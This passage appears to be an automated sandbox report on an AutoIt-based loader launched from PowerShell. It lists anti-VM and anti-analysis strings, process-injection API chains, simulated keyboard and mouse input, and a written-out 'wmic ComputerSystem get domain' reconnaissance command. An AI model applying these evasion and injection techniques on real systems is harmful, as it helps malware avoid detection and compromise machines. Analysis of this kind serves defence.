            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\downloads\Autoit3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SUPERANTISPYWARE.EXE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4041Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5819Jump to behavior
            Source: C:\downloads\Autoit3.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-142196
            Source: C:\downloads\Autoit3.exeAPI coverage: 4.7 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00864005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00864005
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0086C2FF
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086494A GetFileAttributesW,FindFirstFileW,FindClose,3_2_0086494A
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_0086CD9F
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086CD14 FindFirstFileW,FindClose,3_2_0086CD14
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0086F5D8
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0086F735
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0086FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0086FA36
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00863CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00863CE2
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011D2F39 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_011D2F39
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D1F314 FindFirstFileW,FindNextFileW,FindClose,3_2_03D1F314
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03D1DF18 FindFirstFileW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,3_2_03D1DF18
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CF9DF0 FindFirstFileW,FindNextFileW,FindClose,3_2_03CF9DF0
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00815D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00815D13
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
            Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
            Source: Autoit3.exe, 00000003.00000002.1742020740.00000000011E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 00000000.00000002.1799390815.0000024DE2394000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
            Source: C:\downloads\Autoit3.exeAPI call chain: ExitProcess graph end nodegraph_3-141404
            Source: C:\downloads\Autoit3.exeAPI call chain: ExitProcess graph end nodegraph_3-140998
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008745D5 BlockInput,3_2_008745D5
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00815240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00815240
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00835CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00835CAC
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0087C6D9 LoadLibraryA,GetProcAddress,3_2_0087C6D9
            Source: C:\downloads\Autoit3.exeCode function: 3_2_011DFB3A mov eax, dword ptr fs:[00000030h]3_2_011DFB3A
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CEC0EC mov eax, dword ptr fs:[00000030h]3_2_03CEC0EC
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CEC0EC mov eax, dword ptr fs:[00000030h]3_2_03CEC0EC
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CF6FD8 mov eax, dword ptr fs:[00000030h]3_2_03CF6FD8
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_008588CD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0082A385
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082A354 SetUnhandledExceptionFilter,3_2_0082A354

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Contains functionality to inject code into remote processes
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CEFBF0 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,3_2_03CEFBF0
            Contains functionality to inject threads in other processes
            Source: C:\downloads\Autoit3.exeCode function: 3_2_03CEFBF0 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,3_2_03CEFBF0
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00859369 LogonUserW,3_2_00859369
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00815240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00815240
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00861AC6 SendInput,keybd_event,3_2_00861AC6
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008651E2 mouse_event,3_2_008651E2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\downloads\Autoit3.exe "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x Jump to behavior
            Source: C:\downloads\Autoit3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehahebJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domainJump to behavior
            Source: C:\downloads\Autoit3.exeCode function: 3_2_008588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,3_2_008588CD
            Source: C:\downloads\Autoit3.exeCode function: 3_2_00864F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_00864F1C
            Source: Autoit3.exe, 00000003.00000000.1713595565.00000000008B6000.00000002.00000001.01000000.00000009.sdmp, Autoit3.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Autoit3.exeBinary or memory string: Shell_TrayWnd
            Source: C:\downloads\Autoit3.exeCode function: 3_2_0082885B cpuid 3_2_0082885B
            Source: C:\downloads\Autoit3.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_011D3111
            Source: C:\downloads\Autoit3.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_011D321B
            Source: C:\downloads\Autoit3.exeCode function: GetLocaleInfoA,3_2_011D3521
            Source: C:\downloads\Autoit3.exeCode function: GetLocaleInfoA,3_2_011D5439
            Source: C:\downloads\Autoit3.exeCode function: GetLocaleInfoA,3_2_011D5485
            Source: C:\downloads\Autoit3.exeCode function: GetLocaleInfoA,GetACP,3_2_011D6695
            Source: C:\downloads\Autoit3.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_03CC5C24
            Source: C:\downloads\Autoit3.exeCode function: GetLocaleInfoA,3_2_03CC6578
            Source: C:\downloads\Autoit3.exeCode function: GetLocaleInfoA,3_2_03CCCBE4
            Source: C:\downloads\Autoit3.exeCode function: GetLocaleInfoA,3_2_03CCB5C8
            Source: C:\downloads\Autoit3.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_03CC5D2E
            Source: C:\downloads\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\downloads\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\downloads\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\downloads\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
